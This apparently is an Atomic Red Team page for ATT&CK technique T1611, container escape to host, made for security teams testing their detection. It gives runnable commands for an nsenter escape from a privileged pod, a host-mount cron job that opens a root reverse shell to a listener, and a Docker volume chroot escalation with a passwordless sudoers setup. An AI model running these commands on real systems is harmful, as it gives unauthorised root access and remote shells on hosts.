T1611 - Escape to Host
Description from ATT&CK (opens in a new tab)
Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as
to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as
, to break out of the container via a Container Administration Command (opens in a new tab).(Citation: Container Escape) Adversaries may also escape via Exploitation for Privilege Escalation (opens in a new tab), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.
Atomic Tests
Atomic Test #1 - Deploy container using nsenter container escape
Atomic Test #2 - Mount host filesystem to escape privileged Docker container
Atomic Test #3 - Privilege Escalation via Docker Volume Mapping
Atomic Test #1 - Deploy container using nsenter container escape
In this escape kubectl
is used to launch a new pod, with a container that has the host pids mapped into the container (hostPID:true
). It uses the alpine linux container image. It runs with privilege on the host (privileged:true
). When the container is launched the command nsenter --mount=/proc/1/ns/mnt -- /bin/bash
is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container.
Additional Details:
- https://twitter.com/mauilion/status/1129468485480751104 (opens in a new tab)
- https://securekubernetes.com/scenario_2_attack/ (opens in a new tab)
Supported Platforms: Containers
auto_generated_guid: 0b2f9520-a17a-4671-9dba-3bd034099fff
Attack Commands: Run with sh
kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'
Cleanup Commands:
kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
Dependencies: Run with sh
Description: Verify docker is installed.
Check Prereq Commands:
which docker
Get Prereq Commands:
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
Description: Verify docker service is running.
Check Prereq Commands:
sudo systemctl status docker
Get Prereq Commands:
sudo systemctl start docker
Description: Verify kind is in the path.
Check Prereq Commands:
which kind
Get Prereq Commands:
curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
chmod +x ./kind
mv kind /usr/bin/kind
Description: Verify kind-atomic-cluster is created
Check Prereq Commands:
sudo kind get clusters
Get Prereq Commands:
sudo kind create cluster --name atomic-cluster
Description: Verify kubectl is in path
Check Prereq Commands:
which kubectl
Get Prereq Commands:
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x ./kubectl
mv kubectl /usr/bin/kubectl
Atomic Test #2 - Mount host filesystem to escape privileged Docker container
This technique abuses privileged Docker containers to mount the host's filesystem and then create a cron job to launch a reverse shell as the host's superuser. The container running the test needs be privileged. It may take up to a minute for this to run due to how often crond triggers a job. Dev note: the echo to create cron_filename is broken up to prevent localized execution of hostname and id by Powershell.
Supported Platforms: Containers
auto_generated_guid: 6c499943-b098-4bc6-8d38-0956fc182984
Name | Description | Type | Default Value |
mount_device | Path to the device of the host's disk to mount | path | /dev/dm-0 |
mount_point | Path where the host filesystem will be mounted | path | /mnt/T1611.002 |
cron_path | Path on the host filesystem where cron jobs are stored | path | /etc/cron.d |
cron_filename | Filename of the cron job in cron_path | string | T1611_002 |
listen_address | IP address to listen for callback from the host system. | string | `ifconfig eth0 |
listen_port | TCP Port to listen on for callback from the host system. | integer | 4444 |
Attack Commands: Run with sh
! Elevation Required (e.g. root or admin)
if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
netcat -l -p #{listen_port} 2>&1
Cleanup Commands:
rm #{mount_point}#{cron_path}/#{cron_filename}
umount #{mount_point}
rmdir #{mount_point}
Dependencies: Run with sh
Description: Verify mount is installed.
Check Prereq Commands:
which mount
Get Prereq Commands:
if [ "" == "`which mount`" ]; then echo "mount Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install mount ; elif [ -n "`which yum`" ]; then sudo yum -y install mount ; fi ; else echo "mount installed"; fi
Description: Verify container is privileged.
Check Prereq Commands:
capsh --print | grep cap_sys_admin
Get Prereq Commands:
if [ "`capsh --print | grep cap_sys_admin`" == "" ]; then echo "Container not privileged. Re-start container in insecure state. Docker: run with --privileged flag. Kubectl, add securityContext: privileged: true"; fi
Description: Verify mount device (/dev/dm-0) exists.
Check Prereq Commands:
ls #{mount_device}
Get Prereq Commands:
if [ ! -f #{mount_device} ]; then echo "Container not privileged or wrong device path. Re-start container in insecure state. Docker: run with --privileged flag. Kubectl, add securityContext: privileged: true"; fi
Description: Netcat is installed.
Check Prereq Commands:
which netcat
Get Prereq Commands:
if [ "" == "`which netcat`" ]; then echo "netcat Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install netcat ; elif [ -n "`which yum`" ]; then sudo yum -y install netcat ; fi
Description: IP Address is known.
Check Prereq Commands:
if [ "#{listen_address}" != "" ]; then echo "Listen address set as #{listen_address}" ; fi
Get Prereq Commands:
if [ "" == "`which ifconfig`" ]; then echo "ifconfig Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install net=tools ; elif [ -n "`which yum`" ]; then sudo yum -y install net-tools ; fi
Atomic Test #3 - Privilege Escalation via Docker Volume Mapping
This test demonstrates privilege escalation by abusing Docker's volume mapping feature to gain access to the host file system. By mounting the root directory of the host into a Docker container, the attacker can use chroot to operate as root on the host system.
Supported Platforms: Containers
auto_generated_guid: 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4
Name | Description | Type | Default Value |
username | Username that run attack command | string | docker_user |
Attack Commands: Run with sh
! Elevation Required (e.g. root or admin)
echo "Current user: #{username}"
sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"
Cleanup Commands:
USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME"; id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup complete."
Dependencies: Run with sh
Description: Docker
Check Prereq Commands:
command -v docker &> /dev/null && echo "Docker is installed" || { echo "Docker is not installed."; exit 1; }
Get Prereq Commands:
echo "You should install docker manually."
Description: Docker Privileged User
Check Prereq Commands:
sudo -l -U #{username} | grep "(ALL) NOPASSWD: /usr/bin/docker"
Get Prereq Commands:
[[ $EUID -ne 0 ]] && echo "Run as root." && exit 1; id "$USERNAME" &>/dev/null || { useradd -m -s /bin/bash "$USERNAME" && echo "$USERNAME:$PASSWORD" | chpasswd; }; [[ -f "$SUDOERS_FILE" ]] || { echo "$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND" > "$SUDOERS_FILE" && chmod 440 "$SUDOERS_FILE"; }; echo "Setup complete. User: $USERNAME, Password: $PASSWORD"